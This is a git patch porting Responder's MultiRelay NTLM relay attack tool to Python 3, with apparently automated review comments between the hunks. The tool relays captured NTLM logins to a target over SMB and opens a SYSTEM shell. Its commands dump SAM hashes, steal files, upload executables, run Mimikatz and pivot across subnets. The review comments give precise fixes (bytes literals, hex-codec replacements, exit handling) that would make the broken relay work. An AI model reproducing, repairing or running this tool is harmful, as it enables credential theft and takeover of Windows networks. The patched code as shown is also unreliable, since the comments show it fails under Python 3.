From 65971d14ea21d2575d3bf89bbaca5992c83e5840 Mon Sep 17 00:00:00 2001
From: nbadev2 <46690800+nbadev2@users.noreply.github.com>
Date: Wed, 30 Dec 2020 16:25:31 -0500
Subject: [PATCH] Updated MultiRelay and associated files for use with Python3

---
 tools/MultiRelay.py | 240 ++++++++---------
 tools/MultiRelay/RelayMultiCore.py | 372 +++++++++++++-------------
 tools/MultiRelay/RelayMultiPackets.py | 12 +-
 tools/SMBFinger/Finger.py | 52 ++--
 4 files changed, 338 insertions(+), 338 deletions(-)

diff --git a/tools/MultiRelay.py b/tools/MultiRelay.py
index db4416d..109c396 100755
--- a/tools/MultiRelay.py
+++ b/tools/MultiRelay.py
@@ -23,17 +23,17 @@ import time
 import random
 import subprocess
 from threading import Thread
-from SocketServer import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
+from socketserver import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
 try:
 from Crypto.Hash import MD5
 except ImportError:
- print "\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes."
- print "You can install it on debian based os with this command: apt-get install python-crypto"
- print "The Sam file will be saved anyway and you will have the bootkey.\033[0m\n"
+ print ("\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes.")
+ print ("You can install it on debian based os with this command: apt-get install python-crypto")
+ print ("The Sam file will be saved anyway and you will have the bootkey.\033[0m\n")
 try:
 import readline
 except:
- print "Warning: readline module is not available, you will not be able to use the arrow keys for command history"
+ print ("Warning: readline module is not available, you will not be able to use the arrow keys for command history")
 pass
 from MultiRelay.RelayMultiPackets import *
 from MultiRelay.RelayMultiCore import *
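Review bot: The install hint printed in the ImportError branch still names the Python 2 package, `apt-get install python-crypto`, so a user following it on a Python 3 system will not get the `Crypto` namespace this import needs; on Debian-based systems that namespace comes from `python3-pycryptodome`, so the line should read `print ("You can install it on debian based os with this command: apt-get install python3-pycryptodome")`. The `except:` around `import readline` a few lines below is bare and so also swallows SystemExit and KeyboardInterrupt; `except ImportError:` matches the intent, and the `pass` after the print is redundant.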
@@ -72,18 +72,18 @@ parser.add_option('-d', '--dump', action="store_true", help="Dump hashes (script options, args = parser.parse_args() if options.TARGET is None: - print "\n-t Mandatory option is missing, please provide a target.\n" + print ("\n-t Mandatory option is missing, please provide a target.\n") parser.print_help() exit(-1) if options.UserToRelay is None: - print "\n-u Mandatory option is missing, please provide a username to relay.\n" + print ("\n-u Mandatory option is missing, please provide a username to relay.\n") parser.print_help() exit(-1) if options.ExtraPort is None: options.ExtraPort = 0 if not os.geteuid() == 0: - print color("[!] MultiRelay must be run as root.") + print (color("[!] MultiRelay must be run as root.")) sys.exit(-1) OneCommand = options.OneCommand 
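Review bot: The two option-check branches leave with `exit(-1)` while the root check a few lines later uses `sys.exit(-1)`; `exit` is the interactive helper installed by the `site` module and is absent under `python -S`, so the three should agree on `sys.exit(-1)`. `if not os.geteuid() == 0:` reads more directly as `if os.geteuid() != 0:`.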
@@ -98,46 +98,46 @@ Pivoting = [2] def color(txt, code = 1, modifier = 0): - return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) + return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) def ShowWelcome(): - print color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1) - print '\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com' - print 'Usernames to relay (-u) are case sensitive.' - print 'To kill this script hit CTRL-C.\n' - print color('/*',8,1) - print 'Use this script in combination with Responder.py for best results.' - print 'Make sure to set SMB and HTTP to OFF in Responder.conf.\n' - print 'This tool listen on TCP port 80, 3128 and 445.' - print 'For optimal pwnage, launch Responder only with these 2 options:' - print '-rv\nAvoid running a command that will likely prompt for information like net use, etc.' - print 'If you do so, use taskkill (as system) to kill the process.' - print color('*/',8,1) - print color('\nRelaying credentials for these users:',8,1) - print color(UserToRelay,4,1) - print '\n' + print (color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1)) + print ('\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com') + print ('Usernames to relay (-u) are case sensitive.') + print ('To kill this script hit CTRL-C.\n') + print (color('/*',8,1)) + print ('Use this script in combination with Responder.py for best results.') + print ('Make sure to set SMB and HTTP to OFF in Responder.conf.\n') + print ('This tool listen on TCP port 80, 3128 and 445.') + print ('For optimal pwnage, launch Responder only with these 2 options:') + print ('-rv\nAvoid running a command that will likely prompt for information like net use, etc.') + print ('If you do so, use taskkill (as system) to kill the process.') + print (color('*/',8,1)) + print (color('\nRelaying credentials for these users:',8,1)) + print (color(UserToRelay,4,1)) + print ('\n') ShowWelcome() def ShowHelp(): - print color('Available commands:',8,0) - print 
color('dump',8,1)+' -> Extract the SAM database and print hashes.' - print color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)' - print color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)' - print color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)' - print color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)' - print color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\' - print color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)' - print color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to' - print color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)' - print color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)' - print color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)' - print color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)' - print color('help',8,1)+' -> Print this message.' - print color('exit',8,1)+' -> Exit this shell and return in relay mode.' 
- print ' If you want to quit type exit and then use CTRL-C\n' - print color('Any other command than that will be run as SYSTEM on the target.\n',8,1) + print (color('Available commands:',8,0)) + print (color('dump',8,1)+' -> Extract the SAM database and print hashes.') + print (color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)') + print (color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)') + print (color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)') + print (color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)') + print (color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\') + print (color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)') + print (color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to') + print (color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)') + print (color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)') + print (color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)') + print (color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)') + print (color('help',8,1)+' -> Print this message.') + print (color('exit',8,1)+' -> Exit this shell and return in relay mode.') + print (' If you want to quit type exit and then use CTRL-C\n') + print (color('Any other command than that will be run as SYSTEM on the target.\n',8,1)) Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../" Logs = logging 
@@ -153,7 +153,7 @@ def UploadContent(File):
 try:
 RunFinger(Host[0])
 except:
- print "The host %s seems to be down or port 445 down."%(Host[0])
+ print ("The host %s seems to be down or port 445 down."%(Host[0]))
 sys.exit(1)
@@ -190,7 +190,7 @@ def ConnectToTarget():
 except:
 try:
 sys.exit(1)
- print "Cannot connect to target, host down?"
+ print ("Cannot connect to target, host down?")
 except:
 pass
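Review bot: In the inner `try` of the ConnectToTarget failure path (@@ -190) `sys.exit(1)` runs before the print, so the "Cannot connect to target, host down?" message is never shown, and the bare `except:` that follows catches the SystemExit raised by `sys.exit(1)` and passes, so the process does not exit either — the function just returns and the caller carries on without a connection. Print first and let the exit propagate: `print ("Cannot connect to target, host down?")` followed by `sys.exit(1)`, with no inner try/except around them. ConnectToTarget begins outside the hunk, so the outer `except:` and the statement it guards are not visible here.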
@@ -219,45 +219,45 @@ class HTTPProxyRelay(BaseRequestHandler): NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) ##Make sure incoming packet is an NTLM auth, if not send HTTP 407. - if NTLM_Auth: + if NTLM_Auth: #Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth) - Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] + Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] - if Packet_NTLM == "\x01": - ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target. - h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8") - n = SMBNegoCairo(Data = SMBNegoCairoData()) - n.calculate() - packet0 = str(h)+str(n) - buffer0 = longueur(packet0)+packet0 - s.send(buffer0) - smbdata = s.recv(2048) - ##Session Setup AndX Request, NTLMSSP_NEGOTIATE - if smbdata[8:10] == "\x72\x00": - head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00") - t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))# - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(buffer1) - smbdata = s.recv(2048) #got it here. + if Packet_NTLM == "\x01": + ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target. + h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8") + n = SMBNegoCairo(Data = SMBNegoCairoData()) + n.calculate() + packet0 = str(h)+str(n) + buffer0 = longueur(packet0)+packet0 + s.send(buffer0) + smbdata = s.recv(2048) + ##Session Setup AndX Request, NTLMSSP_NEGOTIATE + if smbdata[8:10] == "\x72\x00": + head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00") + t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))# + t.calculate() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(buffer1) + smbdata = s.recv(2048) #got it here. 
## Send HTTP Proxy - Buffer_Ans = WPAD_NTLM_Challenge_Ans() - Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb + Buffer_Ans = WPAD_NTLM_Challenge_Ans() + Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing). - self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client. + self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client. data = self.request.recv(8092) NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9] ##Got NTLM Message 3 from client. - if Packet_NTLM == "\x03": - NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth)) + if Packet_NTLM == "\x03": + NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth)) ##Might be anonymous, verify it and if so, send no go to client. if IsSMBAnonymous(NTLM_Auth): Response = WPAD_Auth_407_Ans() - self.request.send(str(Response)) + self.request.send(str(Response)) data = self.request.recv(8092) else: #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login 
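Review bot: Under Python 3 `self.request.recv` returns bytes, so `re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)` raises TypeError (str pattern on a bytes subject), and even where it is reached `Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]` is bytes so `if Packet_NTLM == "\x01":` is always False, as are `smbdata[8:10] == "\x72\x00"` and `Packet_NTLM == "\x03"`; the `except Exception:` at the end of the handler then closes every connection silently, so the relay never gets past the first request and prints nothing. The literals need bytes prefixes throughout the new side: `NTLM_Auth = re.findall(rb'(?<=Authorization: NTLM )[^\r]*', data)`, `Packet_NTLM = b64decode(b''.join(NTLM_Auth))[8:9]`, `if Packet_NTLM == b"\x01":`. The same str/bytes mismatch is in the HTTPRelay hunks (@@ -316, @@ -340), the SMB status checks in RunShellCmd (@@ -499 onward, e.g. `data[8:10] == "\x73\x6d"`), `ServeOPTIONS` and `IsSMBAnonymous` in RelayMultiCore (@@ -84), and every SVCCTL reply check in RelayMultiCore (`data[8:10] == "\x2e\x00"`, `data[len(data)-4:] == "\x05\x00\x00\x00"` in @@ -643 through @@ -955), where a dead error branch means a context handle gets sliced out of an error reply. `str(h)+str(n)` and `self.request.send(str(Buffer_Ans))` likewise hand text rather than bytes to the sockets; whether the Packet classes can serialize to bytes is decided in RelayMultiPackets, outside this hunk.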
@@ -270,24 +270,24 @@ class HTTPProxyRelay(BaseRequestHandler): t.calculate() packet1 = str(head)+str(t) buffer1 = longueur(packet1)+packet1 - print "[+] SMB Session Auth sent." + print ("[+] SMB Session Auth sent.") s.send(buffer1) smbdata = s.recv(2048) - RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) + RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) if RunCmd is None: s.close() - self.request.close() + self.request.close() return None - else: + else: ##Any other type of request, send a 407. Response = WPAD_Auth_407_Ans() - self.request.send(str(Response)) + self.request.send(str(Response)) except Exception: - self.request.close() + self.request.close() ##No need to print anything (timeouts, rst, etc) to the user console.. - pass + pass class HTTPRelay(BaseRequestHandler): @@ -316,11 +316,11 @@ class HTTPRelay(BaseRequestHandler): NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) ##Make sure incoming packet is an NTLM auth, if not send HTTP 407. - if NTLM_Auth: + if NTLM_Auth: #Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth) - Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] + Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] - if Packet_NTLM == "\x01": + if Packet_NTLM == "\x01": ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target. h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8") n = SMBNegoCairo(Data = SMBNegoCairoData()) 
@@ -340,21 +340,21 @@ class HTTPRelay(BaseRequestHandler): smbdata = s.recv(2048) #got it here. ## Send HTTP Response. - Buffer_Ans = IIS_NTLM_Challenge_Ans() - Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb + Buffer_Ans = IIS_NTLM_Challenge_Ans() + Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing). - self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client. + self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client. data = self.request.recv(8092) NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9] ##Got NTLM Message 3 from client. - if Packet_NTLM == "\x03": - NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth)) + if Packet_NTLM == "\x03": + NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth)) ##Might be anonymous, verify it and if so, send no go to client. if IsSMBAnonymous(NTLM_Auth): Response = IIS_Auth_401_Ans() - self.request.send(str(Response)) + self.request.send(str(Response)) data = self.request.recv(8092) else: #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login 
@@ -367,25 +367,25 @@ class HTTPRelay(BaseRequestHandler): t.calculate() packet1 = str(head)+str(t) buffer1 = longueur(packet1)+packet1 - print "[+] SMB Session Auth sent." + print ("[+] SMB Session Auth sent.") s.send(buffer1) smbdata = s.recv(2048) - RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) + RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) if RunCmd is None: s.close() - self.request.close() + self.request.close() return None - else: + else: ##Any other type of request, send a 401. Response = IIS_Auth_401_Ans() - self.request.send(str(Response)) + self.request.send(str(Response)) except Exception: - self.request.close() + self.request.close() ##No need to print anything (timeouts, rst, etc) to the user console.. - pass + pass class SMBRelay(BaseRequestHandler): @@ -456,11 +456,11 @@ class SMBRelay(BaseRequestHandler): if Pivoting[0] == "1": pass else: - print "[+] SMB Session Auth sent." + print ("[+] SMB Session Auth sent.") s.send(buffer1) smbdata = s.recv(4096) #We're all set, dropping into shell. - RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) + RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) #If runcmd is None it's because tree connect was denied for this user. #This will only happen once with that specific user account. #Let's kill that connection so we can force him to reauth with another account. @@ -480,9 +480,9 @@ class SMBRelay(BaseRequestHandler): return None except Exception: - self.request.close() + self.request.close() ##No need to print anything (timeouts, rst, etc) to the user console.. - pass + pass #Interface starts here. 
@@ -499,20 +499,20 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): # On this block we do some verifications before dropping the user into the shell. if data[8:10] == "\x73\x6d": - print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target." - print "[+] Hashes were saved anyways in Responder/logs/ folder.\n" + print ("[+] Relay failed, Logon Failure. This user doesn't have an account on this target.") + print ("[+] Hashes were saved anyways in Responder/logs/ folder.\n") Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure") del ShellOpen[:] return False if data[8:10] == "\x73\x8d": - print "[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n" + print ("[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n") Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure") del ShellOpen[:] return False if data[8:10] == "\x73\x5e": - print "[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n" + print ("[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n") del ShellOpen[:] return False 
@@ -533,14 +533,14 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): if Pivoting[0] == "1": pass else: - print "[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n" + print ("[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n") Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure") del ShellOpen[:] return False # This one should not happen since we always use the IP address of the target in our tree connects, but just in case.. if data[8:10] == "\x75\xcc": - print "[+] Tree Connect AndX denied. Bad Network Name returned." + print ("[+] Tree Connect AndX denied. Bad Network Name returned.") del ShellOpen[:] return False @@ -549,7 +549,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): if Pivoting[0] == "1": pass else: - print "[+] Looks good, "+Username+" has admin rights on C$." + print ("[+] Looks good, "+Username+" has admin rights on C$.") head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$") t.calculate() @@ -560,12 +560,12 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): ## Run one command. if data[8:10] == "\x75\x00" and OneCommand != None or Dump: - print "[+] Authenticated." + print ("[+] Authenticated.") if OneCommand != None: - print "[+] Running command: %s"%(OneCommand) + print ("[+] Running command: %s"%(OneCommand)) RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0]) if Dump: - print "[+] Dumping hashes" + print ("[+] Dumping hashes") DumpHashes(data, s, Target[0]) os._exit(1) 
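Review bot: In the @@ -560 hunk `if data[8:10] == "\x75\x00" and OneCommand != None or Dump:` parses as `(data[8:10] == "\x75\x00" and OneCommand != None) or Dump`, so with `-d` set the block runs whatever the reply to the IPC$ tree connect from the preceding hunk was, and `DumpHashes` proceeds on a failed or error response; the intent reads as `if data[8:10] == b"\x75\x00" and (OneCommand is not None or Dump):`. The inner `if OneCommand != None:` should likewise be `if OneCommand is not None:`. `os._exit(1)` at the end reports failure status even when the command or dump succeeded; if the hard exit from the handler thread is deliberate, `os._exit(0)` on the success path would at least make the status meaningful to a wrapping script.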
@@ -574,10 +574,10 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): if Pivoting[0] == "1": pass else: - print "[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n" + print ("[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n") ShowHelp() Logs.info("Client:"+clientIP+", "+Domain+"\\"+Username+" --> Target: "+Target[0]+" -> Shell acquired") - print color('Connected to %s as LocalSystem.'%(Target[0]),2,1) + print (color('Connected to %s as LocalSystem.'%(Target[0]),2,1)) while True: @@ -617,7 +617,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): Help = re.findall('^help', Cmd[0]) if Cmd[0] == "exit": - print "[+] Returning in relay mode." + print ("[+] Returning in relay mode.") del Cmd[:] del ShellOpen[:] return None @@ -647,7 +647,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): data = WriteFile(data, s, File, FileSize, FileContent, Target[0]) del Cmd[:] else: - print File+" does not exist, please specify a valid file." + print (File+" does not exist, please specify a valid file.") del Cmd[:] if Delete: @@ -669,7 +669,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): data = RunAsCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0], FileName) del Cmd[:] else: - print RunAsFileName+" does not exist, please specify a valid file." + print (RunAsFileName+" does not exist, please specify a valid file.") del Cmd[:] if LCmd: @@ -685,7 +685,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName) del Cmd[:] else: - print MimikatzFilename+" does not exist, please specify a valid file." + print (MimikatzFilename+" does not exist, please specify a valid file.") del Cmd[:] if Mimi32: 
@@ -697,12 +697,12 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName) del Cmd[:] else: - print Mimikatzx86Filename+" does not exist, please specify a valid file." + print (Mimikatzx86Filename+" does not exist, please specify a valid file.") del Cmd[:] if Pivot: if Pivot[0] == Target[0]: - print "[Pivot Verification Failed]: You're already on this host. No need to pivot." + print ("[Pivot Verification Failed]: You're already on this host. No need to pivot.") del Pivot[:] del Cmd[:] else: @@ -718,7 +718,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): Status, data = VerifyPivot(data, s, clientIP, Username, Domain, Pivot[0], Logs, Target[0], RunAsPath, FileName) if Status == True: - print "[+] Pivoting to %s."%(Pivot[0]) + print ("[+] Pivoting to %s."%(Pivot[0])) if os.path.isfile(RunAsFileName): FileSize, FileContent = UploadContent(RunAsFileName) data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) @@ -734,11 +734,11 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): return None if Status == False: - print "[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host." + print ("[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host.") del Cmd[:] del Pivot[:] else: - print RunAsFileName+" does not exist, please specify a valid file." + print (RunAsFileName+" does not exist, please specify a valid file.") del Cmd[:] if Scan: 
@@ -762,11 +762,11 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
 data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Target[0], RunPath,FileName)
 del Cmd[:]
 else:
- print SysSVCFileName+" does not exist, please specify a valid file."
+ print (SysSVCFileName+" does not exist, please specify a valid file.")
 del Cmd[:]
 if data is None:
- print "\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n"
+ print ("\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n")
 if data[8:10] == "\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop.
 head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@@ -789,7 +789,7 @@ def serve_thread_tcp(host, port, handler):
 server = ThreadingTCPServer((host, port), handler)
 server.serve_forever()
 except:
- print color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1)
+ print (color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1))
 def main():
 try:
diff --git a/tools/MultiRelay/RelayMultiCore.py b/tools/MultiRelay/RelayMultiCore.py
index ee2fa86..ccb737b 100644
--- a/tools/MultiRelay/RelayMultiCore.py
+++ b/tools/MultiRelay/RelayMultiCore.py
@@ -24,7 +24,7 @@ import re
 import datetime
 import threading
 import uuid
-from RelayMultiPackets import *
+from MultiRelay.RelayMultiPackets import *
 from odict import OrderedDict
 from base64 import b64decode, b64encode
 sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'creddump')))
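Review bot: After `if data is None:` prints the "server dropped the connection" message (@@ -762) the function falls straight into `if data[8:10] == "\x2d\x34":`, which raises TypeError on None, so the message is immediately followed by a traceback from the handler thread and the shell state in `ShellOpen` is never cleared; add `del ShellOpen[:]` and `return None` under the None check, matching the other failure branches of this function. The block sits inside the `while True` loop of RunShellCmd, which starts well before this hunk.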
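Review bot: `from odict import OrderedDict` (@@ -24 of RelayMultiCore.py) still pulls the project's own `odict` module while the line above it was rewritten for the new package layout; I have not checked whether that module imports under Python 3, but `collections.OrderedDict` has been in the standard library since 2.7 and is a drop-in replacement here, `from collections import OrderedDict`. If nothing else uses the bundled copy it can then be dropped from the import path.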
@@ -57,17 +57,17 @@ class Packet():
 # Function used to write captured hashs to a file.
 def WriteData(outfile, data, user):
- if not os.path.isfile(outfile):
- with open(outfile,"w") as outf:
- outf.write(data + '\n')
- return
- with open(outfile,"r") as filestr:
- if re.search(user.encode('hex'), filestr.read().encode('hex')):
- return False
- elif re.search(re.escape("$"), user):
- return False
- with open(outfile,"a") as outf2:
- outf2.write(data + '\n')
+ if not os.path.isfile(outfile):
+ with open(outfile,"w") as outf:
+ outf.write(data + '\n')
+ return
+ with open(outfile,"r") as filestr:
+ if re.search(user.encode('hex'), filestr.read().encode('hex')):
+ return False
+ elif re.search(re.escape("$"), user):
+ return False
+ with open(outfile,"a") as outf2:
+ outf2.write(data + '\n')
 #Function used to verify if a previous auth attempt was made.
 def ReadData(Outfile, Client, User, Domain, Target, cmd):
@@ -75,7 +75,7 @@ def ReadData(Outfile, Client, User, Domain, Target, cmd):
 with open(Logs_Path+"logs/"+Outfile,"r") as filestr:
 Login = Client+":"+User+":"+Domain+":"+Target+":Logon Failure"
 if re.search(Login.encode('hex'), filestr.read().encode('hex')):
- print "[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User)
+ print ("[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User))
 return True
 else:
@@ -84,12 +84,12 @@ def ReadData(Outfile, Client, User, Domain, Target, cmd):
 raise
 def ServeOPTIONS(data):
- WebDav= re.search('OPTIONS', data)
- if WebDav:
- Buffer = WEBDAV_Options_Answer()
- return str(Buffer)
+ WebDav= re.search('OPTIONS', data)
+ if WebDav:
+ Buffer = WEBDAV_Options_Answer()
+ return str(Buffer)
- return False
+ return False
 def IsSMBAnonymous(data):
 SSPIStart = data.find('NTLMSSP')
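Review bot: `user.encode('hex')` and `filestr.read().encode('hex')` in WriteData (@@ -57) raise `LookupError: 'hex' is not a text encoding` on Python 3, where that codec is only reachable through `codecs`/`binascii`, so the first account written to an existing log file crashes the handler instead of being deduplicated; `Login.encode('hex')` in ReadData (@@ -75) and `.encode("hex").upper()` in ParseHTTPHash (@@ -101) fail the same way, and ReadData is the guard that stops re-forwarding a credential after a logon failure. The hex round-trip only existed so regex metacharacters in the user name would not be interpreted, so a plain substring test does the job: `if user in filestr.read(): return False`, and `elif '$' in user:` for the machine-account check; in ParseHTTPHash `bytes.hex()` on the raw slice gives the same hex digest. WriteData also returns None on the fresh-file and append paths but False on the skip path; callers that test the result would be clearer with an explicit `return True` after each write.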
